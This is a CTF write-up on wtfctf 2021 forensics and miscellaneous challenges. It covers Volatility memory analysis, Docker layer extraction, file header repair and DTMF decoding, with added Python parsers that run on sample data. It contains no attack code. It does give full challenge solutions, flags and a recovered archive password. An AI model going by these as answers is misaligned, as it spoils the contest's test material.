wtfctf Writeup

This contest ran from 2021/6/3 15:30 (JST) to 2021/6/5 15:30 (JST).
I played with my team again. We finished 8th out of 353 teams with 4138 points.
Below are writeups for the challenges I solved myself.

K3YL0gg3r (Miscellaneous)

The image shows what looks like a sequence of keystrokes. Treating them as keystrokes typed into vi, I replayed them, adjusting as I went.

$ vi keylogger.txt
$ cat keylogger.txt
d3RmQ1RGe1ZpbV9lRGl0MHJfaSRfNHdlUzBtRX0=
$ cat keylogger.txt | base64 -d
wtfCTF{Vim_eDit0r_i$_4weS0mE}
wtfCTF{Vim_eDit0r_i$_4weS0mE}

R3veng3 0f th3 Inv151ble (Miscellaneous)

Whitespace language. Decode it at https://www.dcode.fr/whitespace-language.

wtfCTF{wsp4c3s_m4tt3r!}

W1n_W0n (Miscellaneous)

$ volatility -f Challenge.raw imageinfo
Volatility Foundation Volatility Framework 2.6.1
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_24000, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_24000, Win7SP1x64_23418
                     AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/mnt/hgfs/Shared/work/Challenge.raw)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf80002c450a0L
          Number of Processors : 4
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff80002c46d00L
                KPCR for CPU 1 : 0xfffff880009ef000L
                KPCR for CPU 2 : 0xfffff88002f69000L
                KPCR for CPU 3 : 0xfffff88002fdf000L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2021-05-21 07:23:36 UTC+0000
     Image local date and time : 2021-05-21 00:23:36 -0700

$ volatility -f Challenge.raw --profile=Win7SP1x64 pstree
Volatility Foundation Volatility Framework 2.6.1
Name                                                  Pid   PPid   Thds   Hnds Time
-------------------------------------------------- ------ ------ ------ ------ ----
 0xfffffa8003518460:csrss.exe                         388    364      9    491 2021-05-21 07:21:37 UTC+0000
 0xfffffa8003115360:wininit.exe                       432    364      4     84 2021-05-21 07:21:37 UTC+0000
. 0xfffffa800794db30:lsass.exe                        544    432      9    562 2021-05-21 07:21:37 UTC+0000
. 0xfffffa800242c8a0:lsm.exe                          556    432     10    144 2021-05-21 07:21:37 UTC+0000
. 0xfffffa800313c060:services.exe                     496    432     13    222 2021-05-21 07:21:37 UTC+0000
.. 0xfffffa80034e9b30:svchost.exe                     960    496     21    468 2021-05-21 07:21:38 UTC+0000
.. 0xfffffa80035d76c0:svchost.exe                    1160    496     22    338 2021-05-21 07:21:38 UTC+0000
.. 0xfffffa8003541b30:spoolsv.exe                    1132    496     15    291 2021-05-21 07:21:38 UTC+0000
.. 0xfffffa8002a7ab30:dllhost.exe                    1932    496     18    213 2021-05-21 07:21:39 UTC+0000
.. 0xfffffa800346c560:svchost.exe                     912    496     37    870 2021-05-21 07:21:38 UTC+0000
.. 0xfffffa8003ce4b30:WmiApSrv.exe                   2324    496      8    124 2021-05-21 07:22:00 UTC+0000
.. 0xfffffa800274e5a0:svchost.exe                     668    496     12    375 2021-05-21 07:21:37 UTC+0000
... 0xfffffa8003c18890:WmiPrvSE.exe                  1028    668     13    302 2021-05-21 07:21:59 UTC+0000
... 0xfffffa8007bef370:dllhost.exe                    824    668      6    257 2021-05-21 07:23:37 UTC+0000
... 0xfffffa800373bb30:WmiPrvSE.exe                  1604    668     12    206 2021-05-21 07:21:39 UTC+0000
.. 0xfffffa8003447360:svchost.exe                     880    496     23    525 2021-05-21 07:21:38 UTC+0000
... 0xfffffa80037055a0:dwm.exe                       1496    880      6     77 2021-05-21 07:21:38 UTC+0000
.. 0xfffffa80039f8960:msdtc.exe                      2204    496     15    159 2021-05-21 07:21:39 UTC+0000
.. 0xfffffa80034df060:svchost.exe                     328    496     15    512 2021-05-21 07:21:38 UTC+0000
.. 0xfffffa8003ae5b30:SearchIndexer.                 2576    496     17    660 2021-05-21 07:21:44 UTC+0000
... 0xfffffa8003bd1250:SearchProtocol                2728   2576      8    284 2021-05-21 07:21:45 UTC+0000
... 0xfffffa8003bbab30:SearchFilterHo                2692   2576      6    101 2021-05-21 07:21:45 UTC+0000
.. 0xfffffa80037a3b30:taskhost.exe                   1568    496     11    156 2021-05-21 07:21:38 UTC+0000
.. 0xfffffa8008a20250:svchost.exe                    2376    496      7     97 2021-05-21 07:21:41 UTC+0000
.. 0xfffffa80033ff920:svchost.exe                     840    496     21    421 2021-05-21 07:21:37 UTC+0000
... 0xfffffa80034a6310:audiodg.exe                    992    840      7    133 2021-05-21 07:21:38 UTC+0000
.. 0xfffffa800377fb30:dllhost.exe                    1356    496     24    217 2021-05-21 07:21:39 UTC+0000
.. 0xfffffa801cec81c0:VGAuthService.                 1488    496      4     87 2021-05-21 07:21:38 UTC+0000
.. 0xfffffa8003251630:svchost.exe                     748    496      7    284 2021-05-21 07:21:37 UTC+0000
.. 0xfffffa8003ae1950:VSSVC.exe                      2480    496      8    124 2021-05-21 07:21:41 UTC+0000
.. 0xfffffa80037cbb30:vmtoolsd.exe                   1656    496     12    279 2021-05-21 07:21:38 UTC+0000
 0xfffffa8000ca46f0:System                              4      0    104    487 2021-05-21 07:21:31 UTC+0000
. 0xfffffa80029099d0:smss.exe                         292      4      2     32 2021-05-21 07:21:31 UTC+0000
 0xfffffa80036d7b30:explorer.exe                     1524   1428     40    955 2021-05-21 07:21:38 UTC+0000
. 0xfffffa8003cf51b0:cmd.exe                          832   1524      1     19 2021-05-21 07:21:59 UTC+0000
. 0xfffffa8001e05940:WinRAR.exe                      1640   1524      5    222 2021-05-21 07:23:29 UTC+0000
. 0xfffffa80038a4b30:vm3dservice.ex                  1900   1524      5     47 2021-05-21 07:21:38 UTC+0000
. 0xfffffa8006b2d060:MRCv120.exe                     2984   1524     18    299 2021-05-21 07:22:27 UTC+0000
. 0xfffffa80038ba310:vmtoolsd.exe                    1916   1524      9    172 2021-05-21 07:21:38 UTC+0000
 0xfffffa8002bceaa0:csrss.exe                         448    440     10    247 2021-05-21 07:21:37 UTC+0000
. 0xfffffa8003cfa2d0:conhost.exe                     2300    448      3     51 2021-05-21 07:21:59 UTC+0000
 0xfffffa8007dbd9d0:winlogon.exe                      528    440      5    117 2021-05-21 07:21:37 UTC+0000

$ volatility -f Challenge.raw --profile=Win7SP1x64 cmdline
Volatility Foundation Volatility Framework 2.6.1
************************************************************************
System pid:      4
************************************************************************
smss.exe pid:    292
Command line : \SystemRoot\System32\smss.exe
************************************************************************
csrss.exe pid:    388
Command line : %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
************************************************************************
wininit.exe pid:    432
Command line : wininit.exe
************************************************************************
csrss.exe pid:    448
Command line : %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
************************************************************************
services.exe pid:    496
Command line : C:\Windows\system32\services.exe
************************************************************************
winlogon.exe pid:    528
Command line : winlogon.exe
************************************************************************
lsass.exe pid:    544
Command line : C:\Windows\system32\lsass.exe
************************************************************************
lsm.exe pid:    556
Command line : C:\Windows\system32\lsm.exe
************************************************************************
svchost.exe pid:    668
Command line : C:\Windows\system32\svchost.exe -k DcomLaunch
************************************************************************
svchost.exe pid:    748
Command line : C:\Windows\system32\svchost.exe -k RPCSS
************************************************************************
svchost.exe pid:    840
Command line : C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
************************************************************************
svchost.exe pid:    880
Command line : C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
************************************************************************
svchost.exe pid:    912
Command line : C:\Windows\system32\svchost.exe -k netsvcs
************************************************************************
audiodg.exe pid:    992
Command line : C:\Windows\system32\AUDIODG.EXE 0x2e4
************************************************************************
svchost.exe pid:    328
Command line : C:\Windows\system32\svchost.exe -k LocalService
************************************************************************
svchost.exe pid:    960
Command line : C:\Windows\system32\svchost.exe -k NetworkService
************************************************************************
spoolsv.exe pid:   1132
Command line : C:\Windows\System32\spoolsv.exe
************************************************************************
svchost.exe pid:   1160
Command line : C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
************************************************************************
VGAuthService. pid:   1488
Command line : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
************************************************************************
dwm.exe pid:   1496
Command line : "C:\Windows\system32\Dwm.exe"
************************************************************************
explorer.exe pid:   1524
Command line : C:\Windows\Explorer.EXE
************************************************************************
taskhost.exe pid:   1568
Command line : "taskhost.exe"
************************************************************************
vmtoolsd.exe pid:   1656
Command line : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
************************************************************************
vm3dservice.ex pid:   1900
Command line : "C:\Windows\System32\vm3dservice.exe" -u
************************************************************************
vmtoolsd.exe pid:   1916
Command line : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
************************************************************************
dllhost.exe pid:   1356
Command line : C:\Windows\system32\dllhost.exe /Processid:{AA463B27-DFAF-404C-BC1E-4A5665D5E9EF}
************************************************************************
WmiPrvSE.exe pid:   1604
Command line : C:\Windows\system32\wbem\wmiprvse.exe
************************************************************************
dllhost.exe pid:   1932
Command line : C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
************************************************************************
msdtc.exe pid:   2204
Command line : C:\Windows\System32\msdtc.exe
************************************************************************
svchost.exe pid:   2376
Command line : C:\Windows\system32\svchost.exe -k bthsvcs
************************************************************************
VSSVC.exe pid:   2480
Command line : C:\Windows\system32\vssvc.exe
************************************************************************
SearchIndexer. pid:   2576
Command line : C:\Windows\system32\SearchIndexer.exe /Embedding
************************************************************************
SearchFilterHo pid:   2692
Command line : "C:\Windows\system32\SearchFilterHost.exe" 0 536 540 548 65536 544 
************************************************************************
SearchProtocol pid:   2728
Command line : "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe2_ Global\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" 
************************************************************************
WmiPrvSE.exe pid:   1028
Command line : C:\Windows\system32\wbem\wmiprvse.exe
************************************************************************
cmd.exe pid:    832
Command line : "C:\Windows\system32\cmd.exe" 
************************************************************************
conhost.exe pid:   2300
Command line : \??\C:\Windows\system32\conhost.exe
************************************************************************
WmiApSrv.exe pid:   2324
Command line : C:\Windows\system32\wbem\WmiApSrv.exe
************************************************************************
MRCv120.exe pid:   2984
Command line : "C:\Users\anon\Desktop\MRCv120.exe" 
************************************************************************
WinRAR.exe pid:   1640
Command line : "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\anon\Documents\1mP.zip"
************************************************************************
dllhost.exe pid:    824

$ volatility -f Challenge.raw --profile=Win7SP1x64 filescan | grep 1mP.zip
Volatility Foundation Volatility Framework 2.6.1
0x0000000009793930     16      0 R--rwd \Device\HarddiskVolume2\Users\anon\Documents\1mP.zip

$ volatility -f Challenge.raw --profile=Win7SP1x64 dumpfiles -D ./ -Q 0x0000000009793930
Volatility Foundation Volatility Framework 2.6.1
DataSectionObject 0x09793930   None   \Device\HarddiskVolume2\Users\anon\Documents\1mP.zip

$ volatility -f Challenge.raw --profile=Win7SP1x64 consoles
Volatility Foundation Volatility Framework 2.6.1
**************************************************
ConsoleProcess: conhost.exe Pid: 2300
Console: 0xffb46200 CommandHistorySize: 50
HistoryBufferCount: 1 HistoryBufferMax: 4
OriginalTitle: %SystemRoot%\system32\cmd.exe
Title: C:\Windows\system32\cmd.exe
AttachedProcess: cmd.exe Pid: 832 Handle: 0x10
----
CommandHistory: 0x298bd0 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 1 LastAdded: 0 LastDisplayed: 0
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x10
Cmd #0 at 0x2975a0: W1np@55
----
Screen 0x27b110 X:80 Y:300
Dump:
Microsoft Windows [Version 6.1.7601]                                            
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.                 
                                                                                
C:\Users\anon>W1np@55                                                           
'W1np@55' is not recognized as an internal or external command,                 
operable program or batch file.                                                 
                                                                                
C:\Users\anon>W1np@55                                                           
'W1np@55' is not recognized as an internal or external command,                 
operable program or batch file.                                                 
                                                                                
C:\Users\anon>

$ mv file.None.0xfffffa80030291a0.dat 1mP.zip
$ 7z e -pW1np@55 1mP.zip

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=ja_JP.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i7-10700 CPU @ 2.90GHz (A0655),ASM,AES-NI)

Scanning the drive for archives:
1 file, 4096 bytes (4 KiB)

Extracting archive: 1mP.zip

WARNINGS:
There are data after the end of archive

--
Path = 1mP.zip
Type = zip
WARNINGS:
There are data after the end of archive
Physical Size = 250
Tail Size = 3846

Everything is Ok

Archives with Warnings: 1

Warnings: 1
Size:       28
Compressed: 4096
$ cat 5eCr3T.txt 
wtfCTF{W1nd0w5_1s_f0r_N0085}
wtfCTF{W1nd0w5_1s_f0r_N0085}
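The "data after the end of archive" warning above is typical of a file carved out of a memory image: dumpfiles returns whole pages (4096 bytes) while the archive itself is 250 bytes. The script below, an added example and not part of the original writeup, locates the ZIP end-of-central-directory record and trims the file to its true size before extraction, validating the record so a stray `PK\x05\x06` in the trailing page garbage is not mistaken for the real one. The archive it runs on is constructed inline; the real 1mP.zip is not included.

```python
import io
import struct
import zipfile

EOCD_SIG = b"PK\x05\x06"


def zip_physical_size(data: bytes) -> int:
    """Return the true length of the ZIP archive that starts at offset 0 of data.

    The EOCD record is 22 bytes plus an optional comment whose length sits in
    its last two bytes. Scanning backwards for the signature and checking that
    the central directory it describes ends exactly at the record rejects
    false hits inside the padding. Assumes no prefix data (not a self-extractor).
    """
    pos = data.rfind(EOCD_SIG)
    while pos != -1:
        if pos + 22 <= len(data):
            cd_size, cd_off = struct.unpack_from("<II", data, pos + 12)
            comment_len = struct.unpack_from("<H", data, pos + 20)[0]
            end = pos + 22 + comment_len
            if end <= len(data) and cd_off + cd_size == pos:
                return end
        pos = data.rfind(EOCD_SIG, 0, pos)
    raise ValueError("no end-of-central-directory record found")


def trim_padded_zip(data: bytes) -> bytes:
    """Drop everything after the archive's EOCD record (the page padding)."""
    return data[: zip_physical_size(data)]


def build_padded_sample(page: int = 4096) -> bytes:
    """Constructed stand-in for the dumpfiles output: a one-entry ZIP zero-padded to a page."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("5eCr3T.txt", "constructed sample, not the real flag\n")
    raw = buf.getvalue()
    return raw + b"\x00" * (page - len(raw) % page)


if __name__ == "__main__":
    padded = build_padded_sample()
    trimmed = trim_padded_zip(padded)
    print(len(padded), "->", len(trimmed))
    with zipfile.ZipFile(io.BytesIO(trimmed)) as zf:
        print(zf.namelist(), zf.testzip())
```

On the real dump, `trim_padded_zip(open("1mP.zip","rb").read())` would return the 250-byte archive that 7z reported as the physical size.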

ArchTic (Miscellaneous)

$ sudo docker pull madjelly8504/ctf_challenge
Using default tag: latest
latest: Pulling from madjelly8504/ctf_challenge
2ed520655641: Pull complete 
71981185e000: Pull complete 
382982369315: Pull complete 
d2a0ce0fd011: Pull complete 
a58b40769af8: Pull complete 
Digest: sha256:3c12223b418dcd6871f411536ba750653a0c9e8fc9673b8fb5244a8af421b518
Status: Downloaded newer image for madjelly8504/ctf_challenge:latest
$ sudo docker save madjelly8504/ctf_challenge > ctf_challenge.tar

Extract the tar and look through the files.
Extract the layer.tar under ctf_challenge/a5e8f8c071a82f7b3b5ffca6313d388a99c64d3cfcceaaa851f60cf352bee02b/.
The flag was in layer/.challenge_dir/flag.txt.

wtfCTF{4rch_1s_fun}
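A `docker save` tarball is an outer tar containing manifest.json and one layer.tar per image layer, so the layers can be walked without docker or a running container. The script below is an added example, not part of the original writeup: it iterates every layer in manifest order and reports every file with a given name, including dotfiles such as .challenge_dir/flag.txt. The image it searches is a two-layer sample constructed inline; the real madjelly8504/ctf_challenge image is not included.

```python
import io
import json
import tarfile


def iter_layer_files(saved_image: bytes):
    """Yield (layer_name, member_name, content) for every regular file in every layer."""
    with tarfile.open(fileobj=io.BytesIO(saved_image)) as outer:
        manifest = json.load(outer.extractfile("manifest.json"))
        for layer_name in manifest[0]["Layers"]:          # ordered bottom to top
            layer_bytes = outer.extractfile(layer_name).read()
            with tarfile.open(fileobj=io.BytesIO(layer_bytes)) as layer:
                for member in layer.getmembers():
                    if member.isfile():
                        yield layer_name, member.name, layer.extractfile(member).read()


def find_in_image(saved_image: bytes, filename: str) -> dict:
    """Map 'layer:path' -> content for every file whose basename is filename."""
    hits = {}
    for layer, name, content in iter_layer_files(saved_image):
        if name.rsplit("/", 1)[-1] == filename:
            hits["%s:%s" % (layer, name)] = content
    return hits


def _tar_bytes(entries: dict) -> bytes:
    """Build an in-memory uncompressed tar from {path: bytes}."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for path, data in entries.items():
            info = tarfile.TarInfo(path)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def build_sample_image() -> bytes:
    """Constructed two-layer image in `docker save` layout (sample data, not the challenge image)."""
    layer0 = _tar_bytes({
        "etc/hostname": b"ctf\n",
        ".challenge_dir/flag.txt": b"wtfCTF{sample_flag_not_real}\n",
    })
    layer1 = _tar_bytes({"app/run.sh": b"#!/bin/sh\necho hi\n"})
    manifest = json.dumps([{
        "Config": "cfg.json",
        "RepoTags": ["example/ctf_challenge:latest"],
        "Layers": ["aaaa/layer.tar", "bbbb/layer.tar"],
    }]).encode()
    return _tar_bytes({"manifest.json": manifest, "cfg.json": b"{}",
                       "aaaa/layer.tar": layer0, "bbbb/layer.tar": layer1})


if __name__ == "__main__":
    for key, content in find_in_image(build_sample_image(), "flag.txt").items():
        print(key, content.decode().strip())
```

Against the real file, `find_in_image(open("ctf_challenge.tar","rb").read(), "flag.txt")` does the same walk; because layers are visited bottom to top, a file that a later layer deletes (a `.wh.<name>` whiteout entry) still shows up from the layer that shipped it.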

L0v3 (Miscellaneous)

Open the image in FTK Imager and look mainly at the deleted files. Export [root]-[Songzzz]-[Attention.wav]. The WAV header and chunk identifiers are corrupted, so repair them:

47 49 46 2E → 52 49 46 46
w4VeFMt → WAVEfmt
DATA → data

The audio contains DTMF tones, grouped three digits at a time. Decode them at https://unframework.github.io/dtmf-detect/.

119 116 102 067 084 070 123 121 048 085 095 065 114 051 095 103 048 048 100 095
>>> codes = '119 116 102 067 084 070 123 121 048 085 095 065 114 051 095 103 048 048 100 095'
>>> codes = map(int, codes.split(' '))
>>> ''.join([chr(c) for c in codes])
'wtfCTF{y0U_Ar3_g00d_'

That gives the first half of the flag. Next, export [root]-[Imazesss]-[Incognit0.jpg]. The JPG header is corrupted, so repair it:

4A 46 → FF D8
jf1f → JFIF

The end of the flag is written in the recovered JPG image.

47_Da7A_r3c0v3rY}

That gives the second half; joining it to the first half gives the flag.

wtfCTF{y0U_Ar3_g00d_47_Da7A_r3c0v3rY}

W1n_W0n_Pr0 (Miscellaneous)

$ volatility -f Challenge2.raw imageinfo
Volatility Foundation Volatility Framework 2.6.1
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_24000, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_24000, Win7SP1x64_23418
                     AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/mnt/hgfs/Shared/work/Challenge2.raw)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf80002c3a0a0L
          Number of Processors : 4
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff80002c3bd00L
                KPCR for CPU 1 : 0xfffff880009ef000L
                KPCR for CPU 2 : 0xfffff88003169000L
                KPCR for CPU 3 : 0xfffff880031df000L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2021-05-21 08:00:51 UTC+0000
     Image local date and time : 2021-05-21 01:00:51 -0700

$ volatility -f Challenge2.raw --profile=Win7SP1x64 userassist
Volatility Foundation Volatility Framework 2.6.1
----------------------------
Registry: \??\C:\Users\anon\ntuser.dat 
Path: Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
Last updated: 2021-05-21 08:00:38 UTC+0000

Subkeys:

Values:

REG_BINARY    Microsoft.Windows.GettingStarted : 
Count:          14
Focus Count:    21
Time Focused:   0:07:00.500000
Last updated:   2021-05-21 06:51:08 UTC+0000
Raw Data:
0x00000000  00 00 00 00 0e 00 00 00 15 00 00 00 a0 68 06 00   .............h..
0x00000010  00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf   ................
0x00000020  00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf   ................
0x00000030  00 00 80 bf 00 00 80 bf ff ff ff ff 84 f5 e8 ad   ................
0x00000040  0d 4e d7 01 00 00 00 00                           .N......

        :

REG_BINARY    %windir%\system32\calc.exe : 
Count:          45★
Focus Count:    45
Time Focused:   0:07:03.446000
Last updated:   2021-05-21 08:00:09 UTC+0000
Raw Data:
0x00000000  00 00 00 00 2d 00 00 00 2d 00 00 00 22 74 06 00   ....-...-..."t..
0x00000010  00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf   ................
0x00000020  00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf   ................
0x00000030  00 00 80 bf 00 00 80 bf ff ff ff ff b0 cd fb 51   ...............Q
0x00000040  17 4e d7 01 00 00 00 00                           .N......

REG_BINARY    Microsoft.Windows.StickyNotes : 
Count:          11
Focus Count:    15
Time Focused:   0:05:00.500000
Last updated:   2021-05-21 06:51:08 UTC+0000
Raw Data:
0x00000000  00 00 00 00 0b 00 00 00 0f 00 00 00 e0 93 04 00   ................
0x00000010  00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf   ................
0x00000020  00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf   ................
0x00000030  00 00 80 bf 00 00 80 bf ff ff ff ff 84 f5 e8 ad   ................
0x00000040  0d 4e d7 01 00 00 00 00                           .N......

REG_BINARY    %windir%\system32\SnippingTool.exe : 
Count:          10
Focus Count:    13
Time Focused:   0:04:20.500000
Last updated:   2021-05-21 06:51:08 UTC+0000
Raw Data:
0x00000000  00 00 00 00 0a 00 00 00 0d 00 00 00 a0 f7 03 00   ................
0x00000010  00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf   ................
0x00000020  00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf   ................
0x00000030  00 00 80 bf 00 00 80 bf ff ff ff ff 84 f5 e8 ad   ................
0x00000040  0d 4e d7 01 00 00 00 00                           .N......

REG_BINARY    %windir%\system32\mspaint.exe : 
Count:          14
Focus Count:    45
Time Focused:   0:08:17.665000★
Last updated:   2021-05-21 07:55:49 UTC+0000
Raw Data:
0x00000000  00 00 00 00 0e 00 00 00 2d 00 00 00 0d 96 07 00   ........-.......
0x00000010  00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf   ................
0x00000020  00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf   ................
0x00000030  00 00 80 bf 00 00 80 bf ff ff ff ff 40 88 10 b7   ............@...
0x00000040  16 4e d7 01 00 00 00 00                           .N......

REG_BINARY    %windir%\system32\xpsrchvw.exe : 
Count:          8
Focus Count:    9
Time Focused:   0:03:00.500000
Last updated:   2021-05-21 06:51:08 UTC+0000
Raw Data:
0x00000000  00 00 00 00 08 00 00 00 09 00 00 00 20 bf 02 00   ................
0x00000010  00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf   ................
0x00000020  00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf   ................
0x00000030  00 00 80 bf 00 00 80 bf ff ff ff ff 84 f5 e8 ad   ................
0x00000040  0d 4e d7 01 00 00 00 00                           .N......

        :

REG_BINARY    %ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\WinRAR\WinRAR.lnk : 
Count:          1
Focus Count:    0
Time Focused:   0:00:00.501000
Last updated:   2021-05-21 07:53:35 UTC+0000
Raw Data:
0x00000000  00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00   ................
0x00000010  00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf   ................
0x00000020  00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf   ................
0x00000030  00 00 80 bf 00 00 80 bf ff ff ff ff 00 3c 42 67   .............<Bg
0x00000040  16 4e d7 01 00 00 00 00                           .N......

REG_BINARY    C:\Users\anon\Desktop\Calculator.lnk : 
Count:          27
Focus Count:    0
Time Focused:   0:00:00.527000
Last updated:   2021-05-21 08:00:09 UTC+0000
Raw Data:
0x00000000  00 00 00 00 1b 00 00 00 00 00 00 00 1b 00 00 00   ................
0x00000010  00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf   ................
0x00000020  00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf   ................
0x00000030  00 00 80 bf 00 00 80 bf ff ff ff ff b0 cd fb 51   ...............Q
0x00000040  17 4e d7 01 00 00 00 00                           .N......

calc.exe was run 45 times, and mspaint.exe had focus for 08:17.
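The numbers volatility prints come straight out of the 72-byte Windows 7 UserAssist value: session id, run count, focus count, focus time in milliseconds, ten floats, a 0xffffffff separator, the FILETIME of the last run and four zero bytes, with the value name ROT13-encoded in the hive. The parser below is an added example, not part of the original writeup; it decodes the calc.exe bytes copied from the dump above so they can be checked by hand (the ROT13 name is how that entry is stored in ntuser.dat). Note that for every entry above volatility's Time Focused is 500 ms larger than the raw field (0x067422 = 422946 ms is shown as 0:07:03.446); the parser reports the raw field.

```python
import codecs
import struct
from datetime import datetime, timedelta, timezone

_FMT = "<IIII10fIQI"                 # 4+4+4+4+40+4+8+4 = 72 bytes, little-endian
_EPOCH_DIFF = 116444736000000000     # 100 ns ticks from 1601-01-01 to 1970-01-01


def filetime_to_datetime(ft: int) -> datetime:
    """Convert a Windows FILETIME (100 ns ticks since 1601) to an aware UTC datetime."""
    return datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=(ft - _EPOCH_DIFF) // 10)


def parse_userassist(name_rot13: str, raw: bytes) -> dict:
    """Decode one UserAssist value: name as stored in the hive, data as raw bytes."""
    if len(raw) != struct.calcsize(_FMT):
        raise ValueError("expected a 72-byte Windows 7 UserAssist value, got %d bytes" % len(raw))
    fields = struct.unpack(_FMT, raw)
    _session, run_count, focus_count, focus_ms = fields[:4]
    last_run_ft = fields[15]                  # the Q after the ten floats and the separator
    return {
        "name": codecs.decode(name_rot13, "rot13"),
        "run_count": run_count,
        "focus_count": focus_count,
        "focus_time": timedelta(milliseconds=focus_ms),
        "last_run": filetime_to_datetime(last_run_ft) if last_run_ft else None,
    }


# Raw bytes of the calc.exe entry from the volatility output above.
CALC_NAME_ROT13 = "%jvaqve%\\flfgrz32\\pnyp.rkr"
CALC_RAW = bytes.fromhex(
    "00000000 2d000000 2d000000 22740600"
    "000080bf 000080bf 000080bf 000080bf"
    "000080bf 000080bf 000080bf 000080bf"
    "000080bf 000080bf ffffffff b0cdfb51"
    "174ed701 00000000"
)

if __name__ == "__main__":
    for k, v in parse_userassist(CALC_NAME_ROT13, CALC_RAW).items():
        print("%-12s %s" % (k, v))
```

The same function applied to the mspaint.exe bytes above gives focus time 497165 ms, i.e. the 08:17 used in the flag once rounded as volatility does.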

$ volatility --plugins=../plugins -f Challenge2.raw --profile=Win7SP1x64 usbstor
Volatility Foundation Volatility Framework 2.6.1
Reading the USBSTOR Please Wait
Found USB Drive: 03003017101520132956&0
	Serial Number:	03003017101520132956&0
	Vendor:	SanDisk
	Product:	Cruzer_Blade
	Revision:	1.00
	ClassGUID:	Cruzer_Blade

	ContainerID:	{fdd09cf2-78c9-53d6-ba7b-0f5c9266549a}
	Mounted Volume:	\??\Volume{ffe4e32c-ba01-11eb-9be0-bca8a6af9b68}
	Drive Letter:	\DosDevices\E:
	Friendly Name:	SanDisk Cruzer Blade USB Device
	USB Name:	E:\
	Device Last Connected:	2021-05-21 08:00:17 UTC+0000★

	Class:	DiskDrive
	Service:	disk
	DeviceDesc:	@disk.inf,%disk_devdesc%;Disk drive
	Capabilities:	16
	Mfg:	@disk.inf,%genmanufacturer%;(Standard disk drives)
	ConfigFlags:	0
	Driver:	{4d36e967-e325-11ce-bfc1-08002be10318}\0001
	Compatible IDs:
		USBSTOR\Disk
		USBSTOR\RAW
		
		
	HardwareID:
		USBSTOR\DiskSanDisk_Cruzer_Blade____1.00
		USBSTOR\DiskSanDisk_Cruzer_Blade____
		USBSTOR\DiskSanDisk_
		USBSTOR\SanDisk_Cruzer_Blade____1
		SanDisk_Cruzer_Blade____1
